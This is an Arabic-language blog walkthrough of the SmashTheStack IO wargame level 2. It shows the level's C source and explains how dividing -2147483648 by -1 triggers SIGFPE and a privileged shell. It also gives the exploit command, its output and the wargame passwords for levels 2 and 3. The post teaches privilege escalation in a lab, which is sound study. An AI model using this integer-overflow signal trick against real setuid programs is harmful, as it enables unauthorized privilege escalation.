SmashTheStack #Level 02 wlakthrough

بسم الله الرحمن الرحيم

اللهم لاعلم لنا الا ماعلمتنا انك انت العليم الحكيم

اليوم باذن الله نكمل المرحلة الثانية من سلسلة SmashTheStack

بعد الحصول على الباسوورد من المرحلة الاولى "hgvbmkQIHavkGg5wyk"  ندخل على المرحلة الثانية

ونستعرض الكود البرمجي للمرحلة



 //a little fun brought to you by bla

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <setjmp.h>

void catcher(int a)
{
        setresuid(geteuid(),geteuid(),geteuid());
 printf("WIN!\n");
        system("/bin/sh");
        exit(0);
}

int main(int argc, char **argv)
{
 puts("source code is available in level02.c\n");

        if (argc != 3 || !atoi(argv[2]))
                return 1;
        signal(SIGFPE, catcher);
        return abs(atoi(argv[1])) / atoi(argv[2]);
}


نشوف اول الكود الهيدر وبعده نشوف function اسمها catcher وتاخذ قيمة وهي عدد صحيح 

وتحتوي على الهدف من التحدي هذا وهو الحصول على صلاحيات المرحلة الثالثة وهو الغاية عندنا 

بعدين نجي للروتين main اول سطر فيه لايهم لانه فقط يعرض الجملة 

"source code is available in level02.c"

ولكن if statement  اللي بعد الكلام هو اللي يهمنا 

if statement تتاكد ان فيه ثلاث مدخلات في على سطر الاوامر وان المدخل الثالث لايساوي صفر 

يعني في حال احد الشرطين حصلت راح يرجع البرنامج بالقمية 1 بعدين 

بعدين يجينا السطر التالي 

signal(SIGFPE, catcher);
وهو ارسال اشارة SIGFPE وماخذ ايضا اسم الدالة اللي نبي نوصل لها 

طيب ماهو SIGFPE

هي اشارة ترسل عند حدوث عملية حسابية خاطئة مثل القسمة على 0 مثل ماهو مبين عندنا في الويكيبيديا 

ولكت بما ان المدخل الثالث في سطر الاوامر يتم التحقق منه بانه لايساوي الصفر فالاحتمال هذا بعيد كل البعد اننا نستخدمه وهو القسمة على صفر 

بس نشوف وش متكوب هنا 

http://linux.die.net/man/2/signal

وبالخصوص السطر
 "Also dividing the most negative integer by -1 may generate SIGFPE."

يعني المفهوم لو قسمنا اكبر عدد سالب ياخذه integer على -1 يمكن نرسل الاشارة SIGFPE  اللي هم INT_MIN و INT_MAX 

والسبب ان لو قسمنا -2147483648 على -1 راح يسبب لنا طفح عددي او integer overflow 
level2@io:~$ /levels/level02 -2147483648 -1  
 source code is available in level02.c  
 WIN!  
 sh-4.1$ cat /home/level3/.pass  
 G2K2EP1luDpdNQ
الى هنا ينتهي الدرس
ان اعجبك فاذكر الله وادع لي في الغيب وان لم يعجبك فانتقدني لاصبح افضل 

تعليقات

إرسال تعليق

المشاركات الشائعة من هذه المدونة

CRLF injection [\r\n Carriage Return]

صورة
السلام عليكم ورحمة الله وبركاتة , .  في البداية ناخذ تعريف عن معنى CRLF CRLF   CR=Carriage Return   %0d 0x0D \r LF=Line feed 0x0A %0a \n ماهو crlf عندما يقوم شخص بارسال طلب من المتصفح الى السيرفر  السيرفر راح يرد بالريسبونس يحتوي على  http response headers content Carriage Return Line feed تستخدم في ملاحظه انتهاء الاين او السطر و كما نلاحظ طريقه الفصل بين Header مع الContent Carriage Return&line feed لكن تختلف من ويندوز الى لينكس  حيث الويندوز يتطلب  بانتهى السطر با crlf في بروتوكول http/https اما في لينكس  line feed  lf يتطلب  فقط في بروتوكول الhttp  اين تكمن الثغرة: الثغرة تكمن عندما يضع المبرمج مدخل يستطيع المخترق او المستخدم بالتحكم في response header مثال من بعض الامثله التحكم في الوق مثلا الان وقت الاسغلال والتصعيد من بعض خطورة crlf ممكن التصعيد الى xss ,Session Fixation,openredirect ايضا ممكن rce على حسب المحتوى من خطوره crsf م...
قراءة المزيد

Study in Nosql-Injection-Mongodb

صورة
السلام عليكم ورحمة الله وبركاتة، موضوع المقال اليوم عن حقن النو سكيول في قواعد Mongodb مع بعض الامثله بينها وبين  للتوضيحMysql ,سوف احاول قدر المستطاع ابسط الموضوع مع ذكر اهم الاجزاء في الثغرة. في البداية ناخذ تعريف عن  NOSQL  nosql هي قاعدة بيانات ولكن لا تعتمد على لغة محدده في الاستعلام مثل mysql حيث الاستعلام في mysql يكون ب»لغة "Structured Query Language"   اما في نظيرتها nosql في mongodb Document - Oriented language بحيث انه يقوم بحفظ الوثائق بترميز bson في الجدول المعين او collection من ثم ارسال الطلب من بعدserialzation الى المستخدم سوا كان الترميز   content-type json format or html/-text/plain صوره للتوضيح   وهنا فرق json عن bson في ترميز mongodb  لنفرض وجدنا موقع يطبع ريكوست جيسون ل mongodb  يحتوي على hello world mongodb يقوم بقراءه hello world هاكذا الاختلافات واضحه وصريحه ولكن في تشابه في الية العمل الى حد ما لناخذ امثله mysql+nosql ونقارنهم حتى يتبين  لنا الية ...
قراءة المزيد